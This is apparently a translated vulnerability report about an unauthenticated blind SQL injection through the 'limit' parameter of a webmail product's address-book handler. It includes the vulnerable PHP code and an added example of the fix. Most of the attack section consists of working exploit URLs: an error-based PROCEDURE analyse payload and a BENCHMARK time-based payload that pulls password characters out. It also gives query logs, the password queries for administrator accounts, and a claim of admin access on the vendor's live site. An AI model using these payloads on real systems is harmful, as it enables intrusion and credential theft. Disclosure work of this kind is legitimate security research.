### Brief description:
SQL injection in the MySQL LIMIT clause: insufficient filtering yields a blind injection through which usernames and passwords can be extracted without logging in.
### Detailed description:
Last time I only searched the client directory; today I happened to search the fast directory and found another one.
Note: every function under the client directory requires login to execute; under the fast directory some of the existing functions can be executed without login, although they cannot read mail and so on.
The vulnerability has the same root cause as the previous one, but in a different file. Here the access control is not strict, so any user can reach it, which makes SQL injection possible without logging in. sleep() cannot be used in LIMIT, so BENCHMARK is used for the delay.
Code of the vulnerable file /fast/oab/module/operates.php:
```
if ( ACTION == "member-get" )
{
    $dept_id = gss( $_GET['dept_id'] );
    $keyword = gss( $_GET['keyword'] );
    $page = $_GET['page'] ? gss( $_GET['page'] ) : 1;
    //limit
    $limit = $_GET['limit'] ? gss( $_GET['limit'] ) : 25; // user-controllable variable
    $orderby = gss( $_GET['orderby'] );
    $is_reverse = gss( $_GET['is_reverse'] );
    $data_cache = $Department->getDepartmentByDomainID( $domain_id, "dept_id,name,parent_id,`order`", 0 );
    $department_list = create_array( $data_cache, "dept_id", "name" );
    $where = "";
    if ( $dept_id && $dept_id != "-1" )
    {
        $Tree = $Department->getTreeObject( );
        $Tree->set_data_cache( $data_cache );
        $Tree->sort_data( -1, 1 );
        $dept_ids = $Tree->get_child_id( $dept_id );
        $user_ids = $Department->getMailboxIDByDepartmentID( $dept_ids, 0 );
        $where = "t1.UserID IN (".$user_ids.")";
    }
    if ( $keyword )
    {
        if ( $where )
        {
            $where .= " AND ";
        }
        if ( strpos( $keyword, "@" ) )
        {
            $key_tmp = explode( "@", $keyword );
            $keyword = $key_tmp[0];
        }
        $where .= "(t1.FullName LIKE \"%".$keyword."%\" OR t1.Mailbox LIKE \"%".$keyword."%\")";
    }
    switch ( $orderby )
    {
        case "fullname" :
            $orderby = "t1.FullName";
            break;
        case "mailbox" :
            $orderby = "t1.Mailbox";
            break;
        case "sex" :
            $orderby = "t2.sex";
            break;
        case "birthday" :
            $orderby = "t2.birthday";
            break;
        case "mobile" :
            $orderby = "t2.mobil";
            break;
        case "tel" :
            $orderby = "t2.teleextension";
            break;
        case "position" :
            $orderby = "t2.headship";
            break;
        case "group_num" :
            $orderby = "t2.o_group";
            break;
        case "email" :
            $orderby = "t1.Mailbox";
            break;
        default : // label presumed; it is absent from the original listing
            $orderby = "";
    }
    $arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, $page, $limit, $orderby, $is_reverse, 0 ); // $limit enters the query builder unchanged
    // ... remainder of the handler not shown in the report
}
```
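Why the escaping in that handler cannot protect LIMIT, and how the paging parameters should be handled instead, as an added PHP example that is not the product's own code: gss_like() stands in for the product's gss() (assumed to be addslashes-style), int_param() and fetch_members() are hypothetical names, and an open mysqli connection is assumed.

```php
<?php
// Added example, not the product's own code: why the gss() escaping in the
// handler above cannot protect a numeric slot such as LIMIT, and how the
// paging parameters should be handled instead. gss_like() stands in for gss()
// (assumed addslashes-style); int_param() and fetch_members() are hypothetical
// names; the query mirrors the one in the general log.

function gss_like(string $s): string
{
    return addslashes($s);   // escapes quotes; the LIMIT payload contains none
}

// Accept only an integer in [1, $max] for a parameter that lands in a numeric slot.
function int_param(array $src, string $key, int $default, int $max): int
{
    if (!isset($src[$key]) || $src[$key] === '') {
        return $default;
    }
    $v = filter_var($src[$key], FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => $max]]);
    if ($v === false) {
        http_response_code(400);
        exit('invalid paging parameter');
    }
    return $v;
}

// Even with validated ints, bind the LIMIT values instead of concatenating them.
function fetch_members(mysqli $db, int $domain_id, int $page, int $limit): array
{
    $offset = ($page - 1) * $limit;
    $stmt = $db->prepare(
        'SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* ' .
        'FROM userlist AS t1, mailuserinfo AS t2 ' .
        'WHERE t1.DomainID=? AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 ' .
        'ORDER BY t1.OrderNo DESC, t1.Mailbox ASC LIMIT ?, ?'
    );
    $stmt->bind_param('iii', $domain_id, $offset, $limit);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);   // needs mysqlnd
}

// Constructed input: the first payload from the report. Escaping returns it
// unchanged, while integer validation rejects it outright.
$payload = '1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1)';
var_dump(gss_like($payload) === $payload);
var_dump(filter_var($payload, FILTER_VALIDATE_INT));

// Handler usage: $page  = int_param($_GET, 'page', 1, 100000);
//                $limit = int_param($_GET, 'limit', 25, 200);
```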
$limit is user-controllable, hence the injection. Exploitation process:
First, POST data to the URL (note: this interface is not really an arbitrary login; after it runs, only the few functions that exist there can be executed, so if a function with a SQL defect is executed, a corresponding unauthenticated SQL injection results, and if the security question could be updated, that would allow obtaining any user's password; but the reachable functions are limited and cannot read users' mail, etc.)
![a.png](https://images.seebug.org/upload/201501/29230038f21fc95c78226b5d832527e7a11c828b.png)
After obtaining authentication, execute the following:
http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=member-get&limit=1,1+PROCEDURE+analyse(extractvalue(rand(),concat(0x3a,version())),1)
The result is as follows:
![b.png](https://images.seebug.org/upload/201501/29230238fe9c08289774682e15a67af9e911e29f.png)
The SQL statement executed is:
```
150128 21:44:43 3142 Connect umail@localhost on
3142 Query SET NAMES 'UTF8'
3142 Init DB umail
3142 Query SELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id`
3142 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
3142 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1)
3142 Quit
```
![c.png](https://images.seebug.org/upload/201501/29230313e8d13136347ed2ce45ef3cc7fe234411.png)
Since errors are not echoed back, we use blind injection; the request is:
http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=member-get&limit=1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1)
![d.png](https://images.seebug.org/upload/201501/292303527b109f03009696941b88e194e665eddd.png)
Its SQL is:
```
150128 21:47:16 3144 Connect umail@localhost on
3144 Query SET NAMES 'UTF8'
3144 Init DB umail
3144 Query SELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id`
3144 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
3144 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1)
```
Injection succeeded.
So a script can enumerate various user accounts and passwords. For the administrator accounts:
```
#select+password+from+userlist+where+userid=2    (system user)
#select+password+from+web_usr+where+usr_code=1   (administrator user)
#select+password+from+web_usr+where+usr_code=2   (admin user)
```
For ordinary users, just iterate over userid to get username and password.
Attached: blind injection script (only half written, no binary search etc.; it will do).
Local test:
![j.jpg](https://images.seebug.org/upload/201501/29230727a14da43a2b26191fe2f8e922b37e19d6.jpg)
And screenshots of the admin login on the official site:
![e.png](https://images.seebug.org/upload/201501/292306185e3895e8f00d96837327be0189a39a2e.png)
![f.png](https://images.seebug.org/upload/201501/29230625aa82c0dbe2cf6da5f51296caadc7a140.png)
### Proof of vulnerability:
As above.